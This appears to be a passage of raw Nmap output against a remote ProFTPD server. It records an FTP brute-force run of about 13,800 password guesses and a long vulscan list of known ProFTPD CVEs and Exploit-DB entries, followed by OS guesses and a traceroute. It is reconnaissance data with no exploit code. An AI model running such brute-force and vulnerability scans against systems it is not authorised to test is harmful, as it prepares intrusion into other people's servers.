5198
5199PORT STATE SERVICE VERSION
520021/tcp open ftp ProFTPD
5201| ftp-brute:
5202| Accounts: No valid accounts found
5203|_ Statistics: Performed 13830 guesses in 601 seconds, average tps: 22.2
5204| vulscan: VulDB - https://vuldb.com:
5205| [138380] ProFTPD 1.3.5b mod_copy Code Execution
5206| [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
5207| [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
5208| [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of service
5209| [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
5210| [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
5211| [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
5212| [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory corruption
5213| [56042] GNU C Library up to 2.12.2 proftpd.gnu.c denial of service
5214| [56041] GNU C Library up to 2.12.2 proftpd.gnu.c denial of service
5215| [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
5216| [55403] ProFTPD 1.2.10/1.3.0/1.3.1/1.3.2/1.3.3 mod_site_misc Symlink directory traversal
5217| [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
5218| [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
5219| [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
5220| [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
5221| [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
5222| [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
5223| [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
5224| [33495] ProFTPD 1.3.0a Configuration File affected denial of service
5225| [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
5226| [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
5227|
5228| MITRE CVE - https://cve.mitre.org:
5229| [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
5230| [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
5231| [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
5232| [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
5233| [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652.
5234| [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
5235| [CVE-2010-4052] Stack consumption vulnerability in the regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (resource exhaustion) via a regular expression containing adjacent repetition operators, as demonstrated by a {10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD.
5236| [CVE-2010-4051] The regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (application crash) via a regular expression containing adjacent bounded repetitions that bypass the intended RE_DUP_MAX limitation, as demonstrated by a {10,}{10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD, related to a "RE_DUP_MAX overflow."
5237| [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
5238| [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
5239| [CVE-2009-0919] XAMPP installs multiple packages with insecure default passwords, which makes it easier for remote attackers to obtain access via (1) the "lampp" default password for the "nobody" account within the included ProFTPD installation, (2) a blank default password for the "root" account within the included MySQL installation, (3) a blank default password for the "pma" account within the phpMyAdmin installation, and possibly other unspecified passwords. NOTE: this was originally reported as a problem in DFLabs PTK, but this issue affects any product that is installed within the XAMPP environment, and should not be viewed as a vulnerability within that product. NOTE: DFLabs states that PTK is intended for use in a laboratory with "no contact from / to internet."
5240| [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
5241| [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
5242| [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
5243| [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
5244| [CVE-2007-2165] The Auth API in ProFTPD before 20070417, when multiple simultaneous authentication modules are configured, does not require that the module that checks authentication is the same as the module that retrieves authentication data, which might allow remote attackers to bypass authentication, as demonstrated by use of SQLAuthTypes Plaintext in mod_sql, with data retrieved from /etc/passwd.
5245| [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
5246| [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
5247| [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
5248| [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
5249| [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
5250| [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
5251| [CVE-2005-0484] Format string vulnerability in gprostats for GProFTPD before 8.1.9 may allow remote attackers to execute arbitrary code via an FTP transfer with a crafted filename that causes format string specifiers to be inserted into the ProFTPD transfer log.
5252| [CVE-2004-1602] ProFTPD 1.2.x, including 1.2.8 and 1.2.10, responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.
5253| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
5254| [CVE-2004-0432] ProFTPD 1.2.9 treats the Allow and Deny directives for CIDR based ACL entries as if they were AllowAll, which could allow FTP clients to bypass intended access restrictions.
5255| [CVE-2004-0346] Off-by-one buffer overflow in _xlate_ascii_write() in ProFTPD 1.2.7 through 1.2.9rc2p allows local users to gain privileges via a 1024 byte RETR command.
5256| [CVE-2003-0831] ProFTPD 1.2.7 through 1.2.9rc2 does not properly translate newline characters when transferring files in ASCII mode, which allows remote attackers to execute arbitrary code via a buffer overflow using certain files.
5257| [CVE-2003-0500] SQL injection vulnerability in the PostgreSQL authentication module (mod_sql_postgres) for ProFTPD before 1.2.9rc1 allows remote attackers to execute arbitrary SQL and gain privileges by bypassing authentication or stealing passwords via the USER name.
5258| [CVE-2001-1501] The glob functionality in ProFTPD 1.2.1, and possibly other versions allows remote attackers to cause a denial of service (CPU and memory consumption) via commands with large numbers of wildcard and other special characters, as demonstrated using an ls command with multiple (1) "*/..", (2) "*/.*", or (3) ".*./*?/" sequences in the argument.
5259| [CVE-2001-1500] ProFTPD 1.2.2rc2, and possibly other versions, does not properly verify reverse-resolved hostnames by performing forward resolution, which allows remote attackers to bypass ACLs or cause an incorrect client hostname to be logged.
5260| [CVE-2001-0456] postinst installation script for Proftpd in Debian 2.2 does not properly change the "run as uid/gid root" configuration when the user enables anonymous access, which causes the server to run at a higher privilege than intended.
5261| [CVE-2001-0318] Format string vulnerability in ProFTPD 1.2.0rc2 may allow attackers to execute arbitrary commands by shutting down the FTP server while using a malformed working directory (cwd).
5262| [CVE-2001-0136] Memory leak in ProFTPd 1.2.0rc2 allows remote attackers to cause a denial of service via a series of USER commands, and possibly SIZE commands if the server has been improperly installed.
5263| [CVE-2001-0027] mod_sqlpw module in ProFTPD does not reset a cached password when a user uses the "user" command to change accounts, which allows authenticated attackers to gain privileges of other users.
5264| [CVE-2000-0574] FTP servers such as OpenBSD ftpd, NetBSD ftpd, ProFTPd and Opieftpd do not properly cleanse untrusted format strings that are used in the setproctitle function (sometimes called by set_proc_title), which allows remote attackers to cause a denial of service or execute arbitrary commands.
5265| [CVE-1999-1475] ProFTPd 1.2 compiled with the mod_sqlpw module records user passwords in the wtmp log file, which allows local users to obtain the passwords and gain privileges by reading wtmp, e.g. via the last command.
5266| [CVE-1999-0911] Buffer overflow in ProFTPD, wu-ftpd, and beroftpd allows remote attackers to gain root access via a series of MKD and CWD commands that create nested directories.
5267| [CVE-1999-0368] Buffer overflows in wuarchive ftpd (wu-ftpd) and ProFTPD lead to remote root access, a.k.a. palmetto.
5268|
5269| SecurityFocus - https://www.securityfocus.com/bid/:
5270| [97409] ProFTPD CVE-2017-7418 Local Security Bypass Vulnerability
5271| [89750] ProFTPD CVE-2001-1501 Denial-Of-Service Vulnerability
5272| [88575] ProFTPD CVE-2001-0027 Denial-Of-Service Vulnerability
5273| [84378] Proftpd CVE-2008-7265 Denial-Of-Service Vulnerability
5274| [84329] ProFTPD Out Of Bounds Multiple Memory Corruption Vulnerabilities
5275| [84327] ProFTPD CVE-2016-3125 Diffie Hellman Key Exchange Security Bypass Vulnerability
5276| [82756] ProFTPD CVE-2003-0500 SQL-Injection Vulnerability
5277| [82433] GProFTPD CVE-2005-0484 Remote Security Vulnerability
5278| [77684] ProFTPD Heap Buffer Overflow and Denial of Service Vulnerabilities
5279| [74238] ProFTPD CVE-2015-3306 Information Disclosure Vulnerabilities
5280| [62328] ProFTPD 'mod_sftp_pam' Remote Denial of Service Vulnerability
5281| [57172] ProFTPD Race Condition Local Privilege Escalation Vulnerability
5282| [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
5283| [46183] ProFTPD 'mod_sftp' Module Integer Overflow Vulnerability
5284| [45150] ProFTPD Backdoor Unauthorized Access Vulnerability
5285| [44933] ProFTPD 'mod_sql' Remote Heap Based Buffer Overflow Vulnerability
5286| [44562] ProFTPD Multiple Remote Vulnerabilities
5287| [36804] ProFTPD mod_tls Module NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
5288| [33722] ProFTPD 'mod_sql' Username SQL Injection Vulnerability
5289| [33650] ProFTPD Character Encoding SQL Injection Vulnerability
5290| [23546] ProFTPD AUTH Multiple Authentication Module Security Bypass Vulnerability
5291| [21587] ProFTPD Controls Module Local Buffer Overflow Vulnerability
5292| [21326] ProFTPD MOD_TLS Remote Buffer Overflow Vulnerability
5293| [20992] ProFTPD SReplace Remote Buffer Overflow Vulnerability
5294| [16535] ProFTPD Mod_Radius Buffer Overflow Vulnerability
5295| [14381] ProFTPD Shutdown Message Format String Vulnerability
5296| [14380] ProFTPD SQLShowInfo SQL Output Format String Vulnerability
5297| [12588] GProFTPD GProstats Remote Format String Vulnerability
5298| [11430] ProFTPD Authentication Delay Username Enumeration Vulnerability
5299| [10252] ProFTPD CIDR Access Control Rule Bypass Vulnerability
5300| [9782] ProFTPD _xlate_ascii_write() Buffer Overrun Vulnerability
5301| [8679] ProFTPD ASCII File Transfer Buffer Overrun Vulnerability
5302| [7974] ProFTPD SQL Injection mod_sql Vulnerability
5303| [6781] ProFTPD 1.2.0rc2 log_pri() Format String Vulnerability
5304| [6341] ProFTPD STAT Command Denial Of Service Vulnerability
5305| [3310] ProFTPD Client Hostname Resolving Vulnerability
5306| [2366] ProFTPD USER Remote Denial of Service Vulnerability
5307| [2185] ProFTPD SIZE Remote Denial of Service Vulnerability
5308| [812] ProFTPD mod_sqlpw Vulnerability
5309| [650] ProFTPD snprintf Vulnerability
5310| [612] ProFTPD Remote Buffer Overflow
5311|
5312| IBM X-Force - https://exchange.xforce.ibmcloud.com:
5313| [80980] ProFTPD FTP commands symlink
5314| [71226] ProFTPD pool code execution
5315| [65207] ProFTPD mod_sftp module denial of service
5316| [64495] ProFTPD sql_prepare_where() buffer overflow
5317| [63658] ProFTPD FTP server backdoor
5318| [63407] mod_sql module for ProFTPD buffer overflow
5319| [63155] ProFTPD pr_data_xfer denial of service
5320| [62909] ProFTPD mod_site_misc directory traversal
5321| [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
5322| [53936] ProFTPD mod_tls SSL certificate security bypass
5323| [48951] ProFTPD mod_sql username percent SQL injection
5324| [48558] ProFTPD NLS support SQL injection protection bypass
5325| [45274] ProFTPD URL cross-site request forgery
5326| [33733] ProFTPD Auth API security bypass
5327| [31461] ProFTPD mod_radius buffer overflow
5328| [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
5329| [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
5330| [30147] ProFTPD sreplace() buffer overflow
5331| [21530] ProFTPD mod_sql format string attack
5332| [21528] ProFTPD shutdown message format string attack
5333| [19410] GProFTPD file name format string attack
5334| [18453] ProFTPD SITE CHGRP command allows group ownership modification
5335| [17724] ProFTPD could allow an attacker to obtain valid accounts
5336| [16038] ProFTPD CIDR entry ACL bypass
5337| [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
5338| [12369] ProFTPD mod_sql SQL injection
5339| [12200] ProFTPD ASCII file newline buffer overflow
5340| [10932] ProFTPD long PASS command buffer overflow
5341| [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
5342| [7818] ProFTPD ls "
5343| [7816] ProFTPD file globbing denial of service
5344| [7126] ProFTPD fails to resolve hostnames
5345| [6433] ProFTPD format string
5346| [6209] proFTPD /var symlink
5347| [6208] ProFTPD contains configuration error in postinst script when running as root
5348| [5801] proftpd memory leak when using SIZE or USER commands
5349| [5737] ProFTPD system using mod_sqlpw unauthorized access
5350|
5351| Exploit-DB - https://www.exploit-db.com:
5352| [23170] ProFTPD 1.2.7/1.2.8 ASCII File Transfer Buffer Overrun Vulnerability
5353| [22079] ProFTPD 1.2.x STAT Command Denial of Service Vulnerability
5354| [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability
5355| [20536] ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability
5356| [19503] ProFTPD 1.2 pre6 snprintf Vulnerability
5357| [19476] ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 Remote Buffer Overflow (2)
5358| [19475] ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 Remote Buffer Overflow (1)
5359| [19087] wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (2)
5360| [19086] wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (1)
5361| [18181] FreeBSD ftpd and ProFTPd on FreeBSD Remote r00t Exploit
5362| [16921] ProFTPD-1.3.3c Backdoor Command Execution
5363| [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
5364| [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
5365| [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
5366| [16129] ProFTPD mod_sftp Integer Overflow DoS PoC
5367| [15662] ProFTPD 1.3.3c compromised source remote root Trojan
5368| [15449] ProFTPD IAC Remote Root Exploit
5369| [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
5370| [8037] ProFTPd with mod_mysql Authentication Bypass Vulnerability
5371| [4312] ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit
5372| [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
5373| [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
5374| [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
5375| [3021] ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit
5376| [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
5377| [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
5378| [581] ProFTPD <= 1.2.10 Remote Users Enumeration Exploit
5379| [394] ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl
5380| [244] ProFTPD <= 1.2.0pre10 Remote Denial of Service Exploit
5381| [241] ProFTPD 1.2.0 (rc2) - memory leakage example Exploit
5382| [110] ProFTPD 1.2.7 - 1.2.9rc2 Remote Root & brute-force Exploit
5383| [107] ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit
5384| [43] ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit
5385|
5386| OpenVAS (Nessus) - http://www.openvas.org:
5387| [900815] ProFTPD Server Remote Version Detection
5388| [900507] ProFTPD Server SQL Injection Vulnerability
5389| [900506] ProFTPD Server Version Detection
5390| [900133] ProFTPD Long Command Handling Security Vulnerability
5391| [863897] Fedora Update for proftpd FEDORA-2011-15765
5392| [863633] Fedora Update for proftpd FEDORA-2011-15741
5393| [863630] Fedora Update for proftpd FEDORA-2011-15740
5394| [862999] Fedora Update for proftpd FEDORA-2011-5040
5395| [862992] Fedora Update for proftpd FEDORA-2011-5033
5396| [862829] Fedora Update for proftpd FEDORA-2011-0613
5397| [862828] Fedora Update for proftpd FEDORA-2011-0610
5398| [862658] Fedora Update for proftpd FEDORA-2010-17091
5399| [862546] Fedora Update for proftpd FEDORA-2010-17220
5400| [862544] Fedora Update for proftpd FEDORA-2010-17098
5401| [861120] Fedora Update for proftpd FEDORA-2007-2613
5402| [831503] Mandriva Update for proftpd MDVSA-2011:181 (proftpd)
5403| [831323] Mandriva Update for proftpd MDVSA-2011:023 (proftpd)
5404| [831242] Mandriva Update for proftpd MDVSA-2010:227 (proftpd)
5405| [830311] Mandriva Update for proftpd MDKSA-2007:130 (proftpd)
5406| [830197] Mandriva Update for proftpd MDKA-2007:089 (proftpd)
5407| [801640] ProFTPD Denial of Service Vulnerability
5408| [801639] ProFTPD Multiple Remote Vulnerabilities
5409| [103331] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
5410| [100933] ProFTPD Backdoor Unauthorized Access Vulnerability
5411| [100316] ProFTPD mod_tls Module NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
5412| [71967] Slackware Advisory SSA:2012-041-04 proftpd
5413| [70586] FreeBSD Ports: proftpd, proftpd-mysql
5414| [70560] Debian Security Advisory DSA 2346-2 (proftpd-dfsg)
5415| [70559] Debian Security Advisory DSA 2346-1 (proftpd-dfsg)
5416| [69584] Slackware Advisory SSA:2011-095-01 proftpd
5417| [69327] Debian Security Advisory DSA 2191-1 (proftpd-dfsg)
5418| [69322] Debian Security Advisory DSA 2185-1 (proftpd-dfsg)
5419| [68801] Slackware Advisory SSA:2010-357-02 proftpd
5420| [68702] FreeBSD Ports: proftpd
5421| [68697] FreeBSD Ports: proftpd
5422| [68466] Slackware Advisory SSA:2010-305-03 proftpd
5423| [66585] Fedora Core 11 FEDORA-2009-13236 (proftpd)
5424| [66583] Fedora Core 12 FEDORA-2009-13250 (proftpd)
5425| [66291] Fedora Core 10 FEDORA-2009-11666 (proftpd)
5426| [66290] Fedora Core 11 FEDORA-2009-11649 (proftpd)
5427| [66205] Debian Security Advisory DSA 1925-1 (proftpd-dfsg)
5428| [66091] Mandrake Security Advisory MDVSA-2009:288 (proftpd)
5429| [64966] Fedora Core 10 FEDORA-2009-9386 (proftpd)
5430| [63630] FreeBSD Ports: proftpd, proftpd-mysql
5431| [63573] Debian Security Advisory DSA 1727-1 (proftpd-dfsg)
5432| [63558] Gentoo Security Advisory GLSA 200903-27 (proftpd)
5433| [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
5434| [63128] Fedora Core 8 FEDORA-2009-0195 (proftpd)
5435| [63119] Fedora Core 10 FEDORA-2009-0089 (proftpd)
5436| [63117] Fedora Core 9 FEDORA-2009-0064 (proftpd)
5437| [63061] Debian Security Advisory DSA 1689-1 (proftpd-dfsg)
5438| [61656] FreeBSD Ports: proftpd, proftpd-mysql
5439| [58019] Gentoo Security Advisory GLSA 200702-02 (proftpd)
5440| [57939] Gentoo Security Advisory GLSA 200611-26 (proftpd)
5441| [57786] Debian Security Advisory DSA 1245-1 (proftpd)
5442| [57725] FreeBSD Ports: proftpd, proftpd-mysql
5443| [57703] Slackware Advisory SSA:2006-335-02 proftpd
5444| [57686] Debian Security Advisory DSA 1222-2 (proftpd)
5445| [57683] Debian Security Advisory DSA 1222-1 (proftpd)
5446| [57592] Debian Security Advisory DSA 1218-1 (proftpd)
5447| [57576] FreeBSD Ports: proftpd, proftpd-mysql
5448| [55234] Debian Security Advisory DSA 795-2 (proftpd)
5449| [55007] Gentoo Security Advisory GLSA 200508-02 (proftpd)
5450| [54858] Gentoo Security Advisory GLSA 200502-26 (GProFTPD)
5451| [54569] Gentoo Security Advisory GLSA 200405-09 (proftpd)
5452| [54483] FreeBSD Ports: proftpd, proftpd-mysql
5453| [53882] Slackware Advisory SSA:2003-259-02 ProFTPD Security Advisory
5454| [53794] Debian Security Advisory DSA 032-1 (proftpd)
5455| [53791] Debian Security Advisory DSA 029-1 (proftpd)
5456| [52532] FreeBSD Ports: proftpd
5457| [52464] FreeBSD Ports: proftpd
5458| [15484] proftpd < 1.2.11 remote user enumeration
5459|
5460| SecurityTracker - https://www.securitytracker.com:
5461| [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated Privileges
5462| [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users Execute Arbitrary Code
5463| [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery Attacks
5464| [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in Certain Cases
5465| [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary Code
5466| [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify File/Directory Group Ownership
5467| [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to Remote Users
5468| [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote Authenticated Users Access Files
5469| [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote Users Execute Arbitrary Code With Root Privileges
5470| [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code
5471| [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql Using 'mod_sql' Lets Remote Users Gain Access
5472| [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
5473| [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings
5474| [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
5475|
5476| OSVDB - http://www.osvdb.org:
5477| [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
5478| [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote Memory Corruption
5479| [70868] ProFTPD mod_sftp Component SSH Payload DoS
5480| [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username Handling Remote Overflow
5481| [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned Distribution
5482| [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
5483| [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File Manipulation
5484| [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence Remote Overflow
5485| [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field Null Byte Handling SSL MiTM Weakness
5486| [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
5487| [57310] ProFTPD Multiple Unspecified Overflows
5488| [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
5489| [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
5490| [57307] ProFTPD Multiple Modules Unspecified Overflows
5491| [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
5492| [57305] ProFTPD src/main.c Unspecified Overflow
5493| [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
5494| [57303] ProFTPD modules/mod_auth.c Unspecified Issue
5495| [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL Injection Protection Bypass
5496| [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
5497| [51849] ProFTPD Character Encoding SQL Injection
5498| [51720] ProFTPD NLST Command Argument Handling Remote Overflow
5499| [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
5500| [48411] ProFTPD FTP Command Truncation CSRF
5501| [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
5502| [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
5503| [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
5504| [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
5505| [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
5506| [23063] ProFTPD mod_radius Password Overflow DoS
5507| [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
5508| [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
5509| [18270] ProFTPD ftpshut Shutdown Message Format String
5510| [14012] GProftpd gprostats Utility Log Parser Remote Format String
5511| [10769] ProFTPD File Transfer Newline Character Overflow
5512| [10768] ProFTPD STAT Command Remote DoS
5513| [10758] ProFTPD Login Timing Account Name Enumeration
5514| [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
5515| [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
5516| [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
5517| [7166] ProFTPD SIZE Command Memory Leak Remote DoS
5518| [7165] ProFTPD USER Command Memory Leak DoS
5519| [5744] ProFTPD CIDR IP Subnet ACL Bypass
5520| [5705] ProFTPD Malformed cwd Command Format String
5521| [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
5522| [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
5523| [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
5524|_
5525Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
5526Device type: general purpose
5527Running (JUST GUESSING): Linux 4.X|3.X (90%)
5528OS CPE: cpe:/o:linux:linux_kernel:4.0 cpe:/o:linux:linux_kernel:3
5529Aggressive OS guesses: Linux 4.0 (90%), Linux 3.10 - 3.16 (88%), Linux 3.10 (86%), Linux 3.10 - 3.12 (86%), Linux 4.4 (86%), Linux 4.9 (86%)
5530No exact OS matches for host (test conditions non-ideal).
5531Network Distance: 14 hops
5532
5533TRACEROUTE (using port 21/tcp)
5534HOP RTT ADDRESS
55351 130.61 ms 10.245.200.1
55362 ...
55373 131.50 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
55384 131.45 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
55395 136.81 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
55406 155.22 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
